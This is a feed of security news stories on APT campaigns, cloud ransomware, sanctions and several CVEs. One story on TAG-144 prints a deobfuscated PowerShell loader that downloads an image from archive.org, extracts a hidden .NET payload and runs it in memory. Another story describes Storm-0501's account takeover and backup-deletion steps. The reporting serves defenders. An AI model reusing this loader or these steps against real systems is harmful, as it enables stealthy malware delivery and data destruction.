• Akamai researchers evaluated Microsoft’s patch for the BadSuccessor vulnerability (CVE-2025-53779) to determine its scope and limitations. While the update effectively blocks the original direct escalation path, the core mechanics of BadSuccessor remain exploitable under specific conditions. In this article, we examine how attackers can continue to leverage delegated Managed Service Accounts (dMSAs) for credential theft […]

    The post BadSuccessor After Patch: Using dMSAs for Credential Theft and Lateral Movement in AD appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The U.S. Cybersecurity and Infrastructure Security Agency (CISA), alongside the NSA, FBI, and a broad coalition of international partners, has released a comprehensive cybersecurity advisory detailing a widespread espionage campaign by People’s Republic of China (PRC) state-sponsored actors targeting critical networks worldwide.

    The 37-page report, “Countering Chinese State-Sponsored Actors Compromise of Networks Worldwide to Feed Global Espionage System,” outlines the tactics, techniques, and procedures (TTPs) used by these advanced persistent threat (APT) groups to infiltrate and maintain long-term access to telecommunications, government, transportation, and military infrastructure.

    Key Takeaways
    1. Guide uses MITRE ATT&CK/D3FEND to counter Chinese APTs exploiting CVEs.
    2. Enforce management isolation, disable risky features, and require strong authentication.
    3. Prioritize patching, enable detailed logging, and coordinate threat hunting.

    According to the advisory, these cyber actors tracked by industry groups under names like “Salt Typhoon” and “GhostEmperor” have been operating since at least 2021.

    The operation aims to steal data that allows Chinese intelligence services to track the communications and movements of their targets around the globe.

    The advisory explicitly links the activity to several Chinese technology companies, including Sichuan Juxinhe Network Technology Co. Ltd., which allegedly provides services to China’s military and intelligence arms.

    A key finding of the investigation is that the actors are not relying on zero-day exploits. Instead, they are having “considerable success” by exploiting publicly known and often unpatched common vulnerabilities and exposures (CVEs).

    The report urges network defenders to prioritize patching several specific vulnerabilities, including those affecting Cisco, Palo Alto Networks, and Ivanti devices.

    CVEVendor/ProductDetails
    CVE-2024-21887Ivanti Connect Secure and Ivanti PolicyCommand injection vulnerability, often chained with CVE-2023-46805 for authentication bypass.
    CVE-2024-3400Palo Alto Networks PAN-OS GlobalProtectAllows for unauthenticated remote code execution (RCE) via arbitrary file creation that leads to OS command injection on firewalls with specific GlobalProtect configurations.
    CVE-2023-20273Cisco IOS XEA post-authentication command injection and privilege escalation flaw in the web management UI, frequently chained with CVE-2023-20198 to achieve root-level code execution.
    CVE-2023-20198Cisco IOS XEAn authentication bypass vulnerability in the web UI that enables the creation of unauthorized administrative accounts.
    CVE-2018-0171Cisco IOS and IOS XEA remote code execution vulnerability related to the Smart Install feature .

    The threat actors’ methodology involves a “living off the land” approach. After gaining initial access by exploiting a vulnerable, internet-facing router or firewall, they use the device’s own native tools and capabilities to burrow deeper into the network.

    Techniques include modifying access control lists, capturing network traffic to steal credentials, and using on-box Linux containers like Cisco’s Guest Shell to hide their tools and activities from standard monitoring.

    “These actors often modify routers to maintain persistent, long-term access to networks,” the advisory states. They create covert tunnels, re-route traffic to their own infrastructure, and meticulously clear logs to cover their tracks, making detection extremely difficult.

    The joint advisory represents a massive international effort, with contributing agencies from Australia, Canada, the United Kingdom, New Zealand, Germany, Japan, Italy, and Poland, among others. It provides detailed threat-hunting guidance, urging organizations to:

    • Monitor for unauthorized configuration changes, unexpected network tunnels (GRE, IPsec), and suspicious use of packet capture tools.
    • Audit virtualized containers on network devices for unauthorized activity.
    • Verify firmware and software integrity against vendor-provided hashes.
    • Implement robust logging and forward logs to a secure, centralized server.

    Mitigation strategies focus on hardening network infrastructure. Recommendations include disabling unused ports and services, implementing strict management-plane isolation, enforcing strong, unique credentials, and disabling legacy protocols like Telnet and SNMPv1/v2 in favor of secure, modern alternatives.

    The advisory serves as a critical resource for network defenders, providing not only strategic guidance but also specific indicators of compromise, such as IP addresses used by the actors and YARA rules to detect their custom malware.

    CISA and its partners strongly urge organizations, especially in the telecommunications sector, to use the guide to proactively hunt for malicious activity and fortify their defenses against this persistent global threat.

    Tired of Filling Forms for security & Compliance questionnaires? Automate them in minutes with 1up! Start Your Free Trial Now!

    The post CISA Publish Hunting and Mitigation Guide to Defend Networks from Chinese State-Sponsored Actors appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Microsoft Threat Intelligence has detailed the evolving tactics of the financially motivated threat actor Storm-0501, which has transitioned from traditional on-premises ransomware deployments to sophisticated cloud-based operations. Unlike conventional ransomware that relies on endpoint encryption malware and subsequent decryption key negotiations, Storm-0501 exploits cloud-native capabilities to exfiltrate massive data volumes, obliterate backups, and enforce ransom […]

    The post Microsoft Unveils Storm-0501’s Cloud-Based Ransomware Deployment Tactics appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) announced a fresh round of sanctions against two individuals and two entities for their role in the North Korean remote information technology (IT) worker scheme to generate illicit revenue for the regime’s weapons of mass destruction and ballistic missile programs. “The North Korean regime continues to target American

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Over the past year, a shadowy threat actor known as TAG-144—also tracked under aliases Blind Eagle and APT-C-36—has intensified operations against South American government institutions.

    First observed in 2018, this group has adopted an array of commodity remote access trojans (RATs) such as AsyncRAT, REMCOS RAT, and XWorm, often delivered through highly targeted spearphishing campaigns masquerading as official judicial or tax notifications.

    In mid-2025, Recorded Future analysts noted a significant uptick in activity, with five distinct clusters deploying new infrastructure and exploiting legitimate internet services to stage malware payloads.

    Initial access typically leverages compromised or spoofed email accounts from local government agencies, luring users into opening malicious documents or SVG attachments.

    These attachments often contain embedded JavaScript that, when executed, retrieves a second-stage loader from services like Paste.ee or Discord’s CDN.

    Recorded Future researchers identified numerous compromised Colombian government email addresses used to send deceptive legal summonses, illustrating the adversary’s ability to blend social engineering with technical subterfuge.

    Phishing pages linked to Cluster 4 (Source – Recordedfuture)

    The impact of TAG-144’s campaigns has been most severe in Colombia’s federal and municipal agencies, where exfiltration of credentials and sensitive data poses both espionage and financial extortion risks.

    Despite sharing core tactics across clusters—dynamic DNS domains, open-source RATs, and stolen crypters—the group’s evolving use of steganography and domain generation algorithms (DGAs) marks a notable shift toward more resilient operations.

    Recorded Future analysts noted that this evolution not only complicates traditional defenses but also underscores the blurred line between cybercrime and state-level espionage.

    Infection Mechanism and Steganographic Payload Extraction

    One of TAG-144’s most sophisticated techniques involves embedding a Base64-encoded .NET assembly within the pixel data of a benign JPEG image hosted on Archive[.]org.

    Payload hosted on archive[.]org URL (Source – Recordedfuture)

    Upon execution of the initial PowerShell script, the loader scans for a predefined byte marker before extracting and invoking the payload directly in memory, bypassing disk writes and evading antivirus detection.

    For example, the deobfuscated PowerShell segment responsible for this process appears as:

    $tormodont = 'https://archive.org/download/universe-.../universe.jpg'
    $sclere = New-Object System.Net.WebClient
    $sclere.Headers.Add('User-Agent','Mozilla/5.0')
    $sorority = $sclere.DownloadData($tormodont)
    # Identify marker and extract embedded bytes
    $splenoncus = $sorority[$markerIndex..($sorority.Length - 1)]
    $stream = New-Object IO.MemoryStream
    $stream.Write($splenoncus, 0, $splenoncus.Length)
    $bitmap = [Drawing.Bitmap]::FromStream($stream)
    # Reconstruct payload from pixel data
    foreach ($y in 0..($bitmap.Height-1)) {
      foreach ($x in 0..($bitmap.Width-1)) {
        $color = $bitmap.GetPixel($x,$y)
        $bytesList.Add($color.R); $bytesList.Add($color.G); $bytesList.Add($color.B)
      }
    }
    $payloadBytes = [Convert]::FromBase64String($bytesList[4..($length+3)] -join '')
    [Reflection.Assembly]::Load($payloadBytes).EntryPoint.Invoke($null,$args)

    This in-memory injection, coupled with dynamic domain resolution—often leveraging services like duckdns.org and noip.com—ensures that the RAT’s command-and-control infrastructure remains agile and difficult to trace.

    By avoiding traditional executable downloads and utilizing steganography, TAG-144 demonstrates an advanced understanding of both detection evasion and asset staging, posing a persistent threat to government networks across the region.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post TAG-144 Actors Attacking Government Entities With New Tactics, Techniques, and Procedures appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A recent investigation has uncovered that relying solely on large language models (LLMs) to generate application code can introduce critical security vulnerabilities, according to a detailed blog post published on August 22, 2025. The research underscores that LLMs, which are trained on broad internet data—much of it insecure example code—often replicate unsafe patterns without warning […]

    The post New Research and PoC Reveal Security Risks in LLM-Based Coding appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Cybersecurity researchers at Truesec have uncovered a sophisticated malware campaign distributing a weaponized PDF editor under the guise of “AppSuite PDF Editor.” This operation, which began on June 26, 2025, involves multiple websites promoting the software as a free utility tool, overlapping with findings from Expel on similar threats like ManualFinder. The malicious executable, PDF […]

    The post New TamperedChef Attack Uses Weaponized PDF Editor to Steal Sensitive Data and Login Credentials appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A newly disclosed vulnerability in the widely used ISC Kea DHCP server poses a significant security risk to network infrastructure worldwide. 

    The flaw, designated CVE-2025-40779, allows remote attackers to crash DHCP services with just a single maliciously crafted packet, potentially disrupting network operations across entire organizations.

    The vulnerability affects multiple versions of the Kea DHCP server, including versions 2.7.1 through 2.7.9, 3.0.0, and 3.1.0. 

    Key Takeaways
    1. CVE-2025-40779 lets attackers crash Kea DHCPv4 with one crafted unicast packet.
    2. Affects Kea 2.7.1–2.7.9, 3.0.0, 3.1.0; CVSS 7.5; no workaround.
    3. Upgrade immediately.

    Network administrators running these versions face immediate exposure to denial-of-service attacks that require no authentication or special privileges to execute.

    Kea DHCP Server DoS Vulnerability

    The vulnerability stems from an assertion failure in the kea-dhcp4 process when specific client options interact with the subnet selection mechanism. 

    When a DHCPv4 client transmits a request containing particular option combinations, and the Kea server fails to locate an appropriate subnet for that client, the service terminates unexpectedly with a fatal assertion error.

    The attack vector is particularly concerning because it only affects unicast messages sent directly to the Kea server. 

    Broadcast DHCP messages, which represent normal network traffic, do not trigger this vulnerability. This specificity suggests that attackers could deliberately target DHCP servers with precisely crafted unicast packets designed to exploit this weakness.

    The Common Vulnerability Scoring System (CVSS) has assigned this flaw a score of 7.5, categorizing it as high severity. 

    The CVSS vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H indicates that the vulnerability can be exploited remotely with low complexity, requires no privileges or user interaction, and results in high availability impact.

    The vulnerability was discovered through collaborative security research, with acknowledgments going to Jochen M., Martin Dinev from Trading212, Ashwani Kumar from the Post Graduate Institute of Medical Education & Research in Chandigarh, India, Bret Giddings from the University of Essex, and Florian Ritterhoff from Munich University of Applied Sciences.

    Risk FactorsDetails
    Affected ProductsKea 2.7.1 – 2.7.93.0.03.1.0
    ImpactDenial of Service
    Exploit PrerequisitesRemote unicast DHCPv4 request with specific client option set
    CVSS 3.1 Score7.5 (High)

    Mitigations

    ISC has released patched versions to address this critical vulnerability. Organizations must immediately upgrade to Kea version 3.0.1 or 3.1.1, depending on their current deployment. 

    No workarounds exist for this vulnerability, making immediate patching the only viable defense strategy.

    Network administrators should prioritize this update, as DHCP services represent critical infrastructure components. 

    A successful attack could render entire network segments unable to obtain IP addresses, effectively creating widespread connectivity outages. 

    While ISC reports no known active exploits, the simplicity of the attack vector makes this vulnerability an attractive target for malicious actors seeking to disrupt network operations.

    Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.

    The post Kea DHCP Server Vulnerability Let Remote Attacker With a Single Crafted Packet appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The Cybersecurity and Infrastructure Security Agency (CISA) unveiled a comprehensive Cybersecurity Advisory (CSA) designed to empower network defenders to detect, hunt, and mitigate the activities of advanced persistent threat (APT) actors linked to the People’s Republic of China. Drawing on a coordinated effort with the National Security Agency (NSA), the Federal Bureau of Investigation (FBI), […]

    The post CISA Releases Guide to Hunt and Mitigate Chinese State-Sponsored Threats appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Microsoft Threat Intelligence has released a detailed report exposing a significant evolution in ransomware attacks, pioneered by the financially motivated threat actor Storm-0501.

    The group has shifted from traditional on-premises ransomware to a more destructive, cloud-native strategy that involves data exfiltration and destruction, fundamentally changing the nature of ransomware threats for businesses operating in hybrid cloud environments.

    Unlike conventional attacks that encrypt files on local servers and demand payment for a decryption key, Storm-0501’s new method is far more devastating.

    Overview of Storm-0501 cloud-based ransomware attack chain.
    Overview of Storm-0501 cloud-based ransomware attack chain.

    The group leverages cloud-native capabilities to first exfiltrate massive volumes of sensitive data, then systematically destroys the original data and any backups within the victim’s cloud environment before demanding a ransom.

    This “steal-and-destroy” tactic eliminates the possibility of recovery from local backups and places immense pressure on victim organizations.

    The attack chain, as detailed by Microsoft, is a sophisticated blend of on-premises and cloud infiltration. It often begins with a compromise of a company’s local Active Directory.

    From this foothold, the attackers pivot to the cloud, targeting Microsoft Entra ID (formerly Azure AD). Their primary objective is to find a high-privilege account, such as a Global Administrator, that lacks robust security, particularly multi-factor authentication (MFA).

    In a recent campaign analyzed by Microsoft, Storm-0501 identified a synced, non-human Global Administrator account without a registered MFA method.

    Storm-0501 Attack Chain
    Storm-0501 Attack Chain

    The attackers reset the account’s password on-premises, which then synchronized to the cloud. By taking over this account, they were able to enroll their own MFA device, bypassing existing security policies and gaining complete control over the cloud domain.

    With top-level administrative access, the attackers elevate their privileges within Azure to become an “Owner” of all the organization’s cloud subscriptions.

    They then initiate a discovery phase to map out critical assets, including data stores and backups. Following discovery, they exfiltrate the data using cloud tools like AzCopy.

    The final impact phase is swift and catastrophic. Storm-0501 initiates a mass-deletion of Azure resources, including storage accounts, virtual machine snapshots, and recovery vaults.

    For data protected by resource locks or immutability policies, the attackers first attempt to disable these protections. If unsuccessful, they resort to encrypting the remaining data with a key they control and then deleting the key, rendering the information permanently inaccessible. The extortion demand is then typically delivered via Microsoft Teams using a compromised account.

    To combat these threats, Microsoft is urging organizations to adopt a multi-layered defense strategy. Key recommendations include enforcing phishing-resistant MFA for all users, practicing the principle of least privilege, and ensuring privileged accounts are cloud-native and secured.

    Microsoft also highlights the importance of using built-in cloud security features like Microsoft Defender for Cloud, applying resource locks to critical assets, and enabling immutability and soft-delete policies on storage and key vaults to prevent irreversible data loss.

    Storm-0501, previously known for attacks on U.S. school districts and the healthcare sector, continues to demonstrate its proficiency in navigating complex hybrid environments, underscoring the urgent need for businesses to adapt their security posture for the cloud era.

    Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.

    The post Microsoft Unveils Storm-0501’s Advanced Cloud Ransomware Attack Tactics appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶